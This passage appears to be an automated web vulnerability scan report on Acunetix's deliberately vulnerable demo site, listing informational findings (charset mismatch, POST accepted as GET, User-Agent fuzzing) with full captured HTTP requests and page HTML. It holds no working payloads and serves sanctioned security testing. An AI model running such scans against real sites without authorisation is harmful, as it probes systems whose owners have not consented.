style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	4
Solution	Force UTF-8 for all text content in both the HTTP header and meta tags in HTML or encoding declarations in XML.
Reference	http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
Tags
CWE Id	436
WASC Id	15
Plugin Id	90011

Informational	GET for POST
Description	A request that was originally observed as a POST was also accepted as a GET. This issue does not represent a security weakness unto itself, however, it may facilitate simplification of other attacks. For example if the original POST is subject to Cross-Site Scripting (XSS), then this finding may indicate that a simplified (GET based) XSS may also be possible.

URL	http://testaspnet.vulnweb.com/about.aspx
Method	GET
Parameter
Attack
Evidence	GET http://testaspnet.vulnweb.com/about.aspx?__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw&__VIEWSTATE=/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5 HTTP/1.1
Show / hide Request and Response
Request Header - size: 1,348 bytes.	GET http://testaspnet.vulnweb.com/about.aspx?__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw&__VIEWSTATE=/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:05 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	1
Solution	Ensure that only POST is accepted where POST is expected.
Reference
Tags	OWASP_2021_A04 WSTG-v42-CONF-06 OWASP_2017_A06
CWE Id	16
WASC Id	20
Plugin Id	10058

Informational	User Agent Fuzzer
Description	Check for differences in response based on fuzzed User Agent (eg. mobile sites, access as a Search Engine Crawler). Compares the response statuscode and the hashcode of the response body with the original response.

URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Show / hide Request and Response
Request Header - size: 183 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=bcbcsaab2zrzkp45qaxqzmyq; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:15 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a 